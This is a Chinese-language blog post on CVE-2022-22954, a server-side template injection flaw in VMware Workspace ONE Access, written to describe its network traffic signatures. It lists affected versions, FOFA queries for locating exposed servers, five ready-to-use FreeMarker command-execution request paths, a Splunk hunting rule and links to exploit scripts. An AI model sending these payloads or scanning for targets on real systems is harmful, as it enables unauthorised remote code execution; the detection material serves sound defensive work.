CVE-2022-22954-VMware Workspace ONE Access SSTI远程代码执行流量特征

简介

仅用于技术交流和学习研究使用，请勿用于非法攻击，否则造成一切后果与本人无关

VMware Workspace ONE Access and Identity Manager包含一个由于服务器端模板注入而导致的远程代码执行漏洞。VMware已将此问题的严重性评估为处于严重严重性范围内，CVSSv3基本得分最高为9.8。

具有网络访问权限的恶意行为者可以触发可能导致远程代码执行的服务器端模板注入。

影响范围

VMware Workspace ONE Access Appliance （版本号：20.10.0.0 ，20.10.0.1 ，21.08.0.0 ，21.08.0.1 ）
VMware Identity Manager Appliance （版本号：3.3.3 ， 3.3.4 ， 3.3.5 ，3.3.6）
VMware Realize Automation （版本号：7.6）
1
2
3

EXP/POC

请勿用做非法用途，仅用于检测测试。

fofa语法：

icon_hash="-1250474341"
app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager"
1
2

/catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
1
2
3
4
5

URL decode

/catalog-portal/ui?code=&deviceUdid=&deviceType=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
1
2
3
4
5

检测规则/思路

Splunk公开规则

| tstats count from datamodel=Web where Web.http_method IN ("GET")
  Web.url="*deviceudid=*" AND Web.url IN ("*java.lang.ProcessBuilder*","*freemarker.template.utility.ObjectConstructor*")
  by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype
  | `drop_dm_object_name("Web")` 
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)` 
  | `vmware_server_side_template_injection_hunt_filter
1
2
3
4
5
6
7

结合状态码及返回内容包进行分析研判。以下可作为参考：

返回状态为200，且包涵Authorization context is not valid
1

参考推荐

vmware_server_side_template_injection_hunt

https://github.com/splunk/security_content/blob/develop/detections/web/vmware_server_side_template_injection_hunt.yml

利用脚本

https://github.com/bewhale/CVE-2022-22954

CVE-2022-22954 VMware Workspace ONE Access SSTI RCE

https://xz.aliyun.com/t/11196

zeek-CVE-2022-22954

https://github.com/corelight/cve-2022-22954

相关阅读:
力扣刷题记录167.1-----1356. 根据数字二进制下 1 的数目排序
从0开始用C写贪吃蛇（基于链表）
el-table ＜template slot=“header“＞不更新问题
【前端学习】—JS判断数据类型的方式有哪些（八）
LruCache的使用
(18)线程的实例认识:线程的控制,暂停,继续,停止,线程相互控制,协作
JVM性能调优的6大步骤，及关键调优参数详解
在Qt创建的UI中放一个显示点云的窗口（PCL+QT5）
Vue-事件
android studio编译项目遇到的常见问题

原文地址：https://blog.csdn.net/qq_36334464/article/details/125457423